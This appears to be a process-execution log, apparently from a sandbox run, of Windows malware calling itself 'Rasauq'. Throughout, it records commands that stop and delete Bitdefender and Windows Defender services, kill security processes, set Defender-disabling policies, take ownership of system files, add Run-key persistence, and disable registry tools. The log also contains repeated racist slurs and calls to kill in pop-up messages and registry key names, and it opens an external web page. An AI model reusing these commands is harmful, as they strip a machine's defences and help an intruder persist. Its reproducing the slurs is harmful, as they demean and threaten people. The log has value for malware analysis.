icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\taskkill.exe

taskkill /F /IM epssecurityservice.exe /T

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\calc.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\sc.exe

sc stop bdservicehost

C:\Windows\system32\sc.exe

sc delete bdservicehost

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y

C:\Windows\system32\sc.exe

sc stop bdagent

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\sc.exe

sc delete bdagent

C:\Windows\system32\sc.exe

sc stop bdredline

C:\Windows\system32\sc.exe

sc delete bdredline

C:\Windows\system32\sc.exe

sc stop bdparentalservice

C:\Windows\system32\powercfg.exe

powercfg /hibernate off REM Disables hibernation

C:\Windows\system32\sc.exe

sc delete bdparentalservice

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in

C:\Windows\system32\sc.exe

sc stop bdreinit

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in

C:\Windows\system32\sc.exe

sc delete bdreinit

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "Device Name"

C:\Windows\system32\sc.exe

sc stop bdsubwiz

C:\Windows\system32\sc.exe

sc delete bdsubwiz

C:\Windows\system32\sc.exe

sc stop seccenter

C:\Windows\system32\sc.exe

sc delete seccenter

C:\Windows\system32\sc.exe

sc stop vsserv

C:\Windows\system32\sc.exe

sc delete vsserv

C:\Windows\system32\sc.exe

sc stop epssecurityservice

C:\Windows\system32\sc.exe

sc delete epssecurityservice

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "USB Root Hub"

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCR\behead all niggers" /f

C:\Windows\system32\reg.exe

reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f

C:\Windows\system32\reg.exe

reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc delete WinDefend

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc delete SecurityHealthService

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc delete Sense

C:\Windows\system32\taskkill.exe

taskkill /F /IM MsMpEng.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM MpCmdRun.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM SecurityHealthSystray.exe /T

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM smartscreen.exe /T

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f

C:\Windows\system32\takeown.exe

takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\Windows Defender" /r /d y

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "Suchvorgang abgeschlossen: 20 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f

C:\Windows\system32\msg.exe

msg * /time:3 "This machine has been compromised by Rasuaq"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\notepad.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\calc.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\powercfg.exe

powercfg /hibernate off REM Disables hibernation

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "Device Name"

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "USB Root Hub"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCR\behead all niggers" /f

C:\Windows\system32\reg.exe

reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "Suchvorgang abgeschlossen: 39 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f

C:\Windows\system32\msg.exe

msg * /time:3 "This machine has been compromised by Rasuaq"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x308,0x7ff98630f208,0x7ff98630f214,0x7ff98630f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1868,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=1884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=de --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2500,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3408,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4140,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4852 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4808,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5136,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5324,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5540,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5748,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

